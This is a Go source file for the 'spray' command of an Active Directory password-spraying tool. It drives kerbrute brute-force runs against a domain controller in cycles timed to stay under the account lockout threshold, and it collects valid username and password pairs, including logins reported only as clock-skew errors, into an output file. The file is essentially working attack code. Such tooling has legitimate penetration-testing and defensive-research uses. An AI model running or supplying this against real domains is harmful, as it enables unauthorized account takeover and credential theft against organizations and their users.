package cmd

import (
	"bufio"
	"fmt"
	"os"
	"os/exec"
	"path/filepath"
	"regexp"
	"strings"
	"time"

	"github.com/m10x/adspraygen/pkg"

	"github.com/spf13/cobra"
)

var (
	sprayFile                string
	sprayDomain              string
	sprayLockoutThreshold    int
	sprayResetLockoutMinutes int
	sprayDomainController    string
	sprayExtraFlags          string
	sprayTimeSync            bool
	sprayUseSudoForTimeSync  bool
	sprayOutputFile          string
	ansiEscapeRegex          = regexp.MustCompile(`\x1b\[[0-9;]*[A-Za-z]`)
	kdcEndpointRegex         = regexp.MustCompile(`>\s+[A-Za-z0-9.-]+:\d+\s*$`)
)

var sprayCmd = &cobra.Command{
	Use:   "spray",
	Short: "Run kerbrute bruteforce in lockout-safe cycles",
	Long:  "Implements the behavior of ADSprayKerbruteWrapper.py by iterating output files and respecting lockout timing.",
	Run: func(cmd *cobra.Command, args []string) {
		lockoutThreshold, resetLockoutMinutes := resolveSprayLockoutConfig(cmd)
		if lockoutThreshold < 0 {
			pkg.PrintFatal("--lockout-threshold must be >= 0")
		}
		if lockoutThreshold == 1 {
			pkg.PrintFatal("--lockout-threshold=1 is not supported for safe spraying; use 0 (disabled lockout) or >=2")
		}
		if resetLockoutMinutes < 0 {
			pkg.PrintFatal("--reset-lockout-counter must be >= 0")
		}
		if _, err := os.Stat(sprayFile); err != nil {
			pkg.PrintFatal(err.Error())
		}

		if sprayTimeSync {
			syncTimeWithDC(sprayDomainController, sprayUseSudoForTimeSync)
		}

		var successWriter *bufio.Writer
		var successFile *os.File
		if strings.TrimSpace(sprayOutputFile) != "" {
			f, path := pkg.CreateOutputFile(sprayOutputFile)
			if f == nil {
				pkg.PrintFatal("Could not create output file")
			}
			pkg.PrintInfo(fmt.Sprintf("Writing successful logins to %s", path))
			successFile = f
			successWriter = bufio.NewWriter(f)
			defer func() {
				_ = successWriter.Flush()
				_ = successFile.Close()
			}()
		}

		runKerbruteLoop(
			sprayFile,
			sprayDomain,
			lockoutThreshold,
			resetLockoutMinutes,
			sprayDomainController,
			sprayExtraFlags,
			successWriter,
		)
	},
}

func init() {
	rootCmd.AddCommand(sprayCmd)

	sprayCmd.Flags().StringVarP(&sprayFile, "file", "f", "", "Input combo file (generated by gen)")
	sprayCmd.Flags().StringVarP(&sprayDomain, "domain", "d", "", "AD domain")
	sprayCmd.Flags().IntVarP(&sprayLockoutThreshold, "lockout-threshold", "t", 10, "Account lockout threshold")
	sprayCmd.Flags().IntVarP(&sprayResetLockoutMinutes, "reset-lockout-counter", "r", 30, "Minutes until lockout counter reset")
	sprayCmd.Flags().StringVar(&sprayDomainController, "dc", "", "Domain controller hostname or IP")
	sprayCmd.Flags().StringVar(&sprayExtraFlags, "extra-flags", "", "Extra flags passed to kerbrute")
	sprayCmd.Flags().StringVarP(&sprayOutputFile, "output", "o", "", "Write successful [+] VALID LOGIN lines to this file")
	sprayCmd.Flags().BoolVar(&sprayTimeSync, "time-sync", false, "Sync time with the DC before spraying (disabled by default)")
	sprayCmd.Flags().BoolVar(&sprayUseSudoForTimeSync, "time-sync-sudo", true, "Use sudo when syncing time with ntpdate (only used with --time-sync)")

	_ = sprayCmd.MarkFlagRequired("file")
	_ = sprayCmd.MarkFlagRequired("domain")
	_ = sprayCmd.MarkFlagRequired("dc")
}

func syncTimeWithDC(domainController string, withSudo bool) {
	pkg.PrintInfo(fmt.Sprintf("Syncing time with DC %s", domainController))

	cmdArgs := []string{"ntpdate", domainController}
	command := "sudo"
	if !withSudo {
		command = "ntpdate"
		cmdArgs = []string{domainController}
	}

	cmd := exec.Command(command, cmdArgs...)
	cmd.Stdout = os.Stdout
	cmd.Stderr = os.Stderr
	if err := cmd.Run(); err != nil {
		pkg.PrintWarning(fmt.Sprintf("Time sync failed: %v", err))
	}
}

func resolveSprayLockoutConfig(cmd *cobra.Command) (int, int) {
	lockoutFlagSet := cmd.Flags().Changed("lockout-threshold")
	resetFlagSet := cmd.Flags().Changed("reset-lockout-counter")

	if lockoutFlagSet || resetFlagSet {
		return sprayLockoutThreshold, sprayResetLockoutMinutes
	}

	const cacheFile = "ldap_cache.json"
	cachedData, err := pkg.LoadLDAPDataFromCache(cacheFile)
	if err != nil {
		pkg.PrintFatal("--lockout-threshold and --reset-lockout-counter are not set and no LDAP cache was found. Run gen first or set both flags explicitly.")
	}
	if cachedData == nil || cachedData.PasswordPolicy == nil {
		pkg.PrintFatal("--lockout-threshold and --reset-lockout-counter are not set and no cached password policy is available. Run gen first or set both flags explicitly.")
	}

	threshold := cachedData.PasswordPolicy.LockoutThreshold
	resetMinutes := int(cachedData.PasswordPolicy.LockoutObservationMinutes)

	if threshold < 0 {
		pkg.PrintFatal("Cached lockout policy is invalid (lockoutThreshold < 0). Set --lockout-threshold and --reset-lockout-counter explicitly.")
	}
	if threshold == 1 {
		pkg.PrintFatal("Cached lockout policy with lockoutThreshold=1 is not supported for safe spraying. Set --lockout-threshold explicitly to 0 or >=2.")
	}
	if resetMinutes < 0 {
		pkg.PrintFatal("Cached lockout observation window is invalid. Set --reset-lockout-counter explicitly.")
	}

	pkg.PrintInfo(fmt.Sprintf("Using cached lockout policy from %s (threshold=%d, reset=%d)", cacheFile, threshold, resetMinutes))
	return threshold, resetMinutes
}

func runKerbruteLoop(filenameArg, domain string, accountLockoutThreshold, resetAccountLockoutCounter int, domainController, extraFlags string, successWriter *bufio.Writer) {
	counterFile := 0
	counterKerbrute := 0
	var successfulSprays []string

	if accountLockoutThreshold == 0 {
		pkg.PrintInfo("Lockout threshold is 0 (no account lockout). Running without lockout wait cycles.")
	}

	for {
		filename := filenameArg
		if counterFile > 0 {
			filename = modifyFilename(filenameArg, fmt.Sprintf("_%d", counterFile))
		}

		if _, err := os.Stat(filename); err != nil {
			pkg.PrintInfo(fmt.Sprintf("File %s does not exist.", filename))
			break
		}

		pkg.PrintInfo(fmt.Sprintf("Running kerbrute with %s", filename))

		cmdArgs := []string{"bruteforce", "--domain", domain, "--dc", domainController, "-v"}
		if strings.TrimSpace(extraFlags) != "" {
			cmdArgs = append(cmdArgs, strings.Fields(extraFlags)...)
		}
		cmdArgs = append(cmdArgs, filename)

		cmd := exec.Command("kerbrute", cmdArgs...)
		stdoutPipe, err := cmd.StdoutPipe()
		if err != nil {
			pkg.PrintWarning(fmt.Sprintf("could not attach stdout for %s: %v", filename, err))
			counterFile++
			counterKerbrute++
			continue
		}
		cmd.Stderr = os.Stderr

		if err := cmd.Start(); err != nil {
			pkg.PrintWarning(fmt.Sprintf("could not start kerbrute for %s: %v", filename, err))
			counterFile++
			counterKerbrute++
			continue
		}

		runMatches := make(chan []string, 1)
		go func() {
			scanner := bufio.NewScanner(stdoutPipe)
			buf := make([]byte, 0, 1024*64)
			scanner.Buffer(buf, 1024*1024)

			var matches []string
			for scanner.Scan() {
				line := scanner.Text()
				if shouldSkipSprayOutputLine(line) {
					continue
				}
				fmt.Println(line)
				if credential, ok := extractCredentialFromValidLoginLine(line); ok {
					matches = append(matches, credential)
					if successWriter != nil {
						if _, writeErr := successWriter.WriteString(credential + "\n"); writeErr != nil {
							pkg.PrintWarning(fmt.Sprintf("Could not write spray output: %v", writeErr))
						} else {
							_ = successWriter.Flush()
						}
					}
				}
			}

			if scanErr := scanner.Err(); scanErr != nil {
				pkg.PrintWarning(fmt.Sprintf("reading kerbrute output failed: %v", scanErr))
			}
			runMatches <- matches
		}()

		if err := cmd.Wait(); err != nil {
			pkg.PrintWarning(fmt.Sprintf("kerbrute run failed for %s: %v", filename, err))
		}

		matches := <-runMatches
		successfulSprays = append(successfulSprays, matches...)

		counterFile++
		counterKerbrute++
		if accountLockoutThreshold > 0 && counterKerbrute == accountLockoutThreshold-1 {
			waitMinutes := resetAccountLockoutCounter + 1
			pkg.PrintWarning(fmt.Sprintf("Lockout threshold %d almost reached (%d). Waiting %d minutes...", accountLockoutThreshold, counterKerbrute, waitMinutes))
			time.Sleep(time.Duration(waitMinutes) * time.Minute)
			counterKerbrute = 0
		}
	}

	if len(successfulSprays) > 0 {
		fmt.Println()
		pkg.PrintSuccess("Successful sprays summary")
		for _, line := range successfulSprays {
			fmt.Println(line)
		}
	}

	pkg.PrintSuccess("Password spraying completed.")
}

func shouldSkipSprayOutputLine(line string) bool {
	cleanLine := stripANSI(line)
	trimmed := strings.TrimSpace(cleanLine)
	if trimmed == "" {
		return true
	}
	if strings.HasPrefix(cleanLine, " ") {
		return true
	}
	if strings.HasPrefix(cleanLine, "/") {
		return true
	}
	if strings.HasPrefix(cleanLine, "Version") {
		return true
	}
	if strings.Contains(cleanLine, "Using KDC(s):") {
		return true
	}
	if strings.Contains(cleanLine, " - Invalid password") {
		return true
	}
	if kdcEndpointRegex.MatchString(cleanLine) {
		return true
	}

	return false
}

func extractCredentialFromValidLoginLine(line string) (string, bool) {
	line = stripANSI(line)
	// valid login lines look like this:
	const marker = "VALID LOGIN:"
	idx := strings.Index(line, marker)
	if idx == -1 {
		// if time is not synced, a valid login may instead be reported as a KRB_AP_ERR_SKEW error
		const skewMarker = "[!]"
		const rootCauseMarker = " - [Root cause:"

		if !strings.Contains(line, "KRB_AP_ERR_SKEW") {
			return "", false
		}

		skewIdx := strings.Index(line, skewMarker)
		if skewIdx == -1 {
			return "", false
		}

		rootCauseIdx := strings.Index(line[skewIdx+len(skewMarker):], rootCauseMarker)
		if rootCauseIdx == -1 {
			return "", false
		}

		credentialPart := line[skewIdx+len(skewMarker) : skewIdx+len(skewMarker)+rootCauseIdx]
		credential := strings.TrimSpace(credentialPart)
		if credential == "" {
			return "", false
		}

		return credential, true
	}

	credential := strings.TrimSpace(stripANSI(line[idx+len(marker):]))
	if credential == "" {
		return "", false
	}

	return credential, true
}

func stripANSI(input string) string {
	if input == "" {
		return ""
	}
	return ansiEscapeRegex.ReplaceAllString(input, "")
}

func modifyFilename(path, appendStr string) string {
	ext := filepath.Ext(path)
	if ext == "" {
		return path + appendStr
	}
	base := strings.TrimSuffix(path, ext)
	return base + appendStr + ext
}
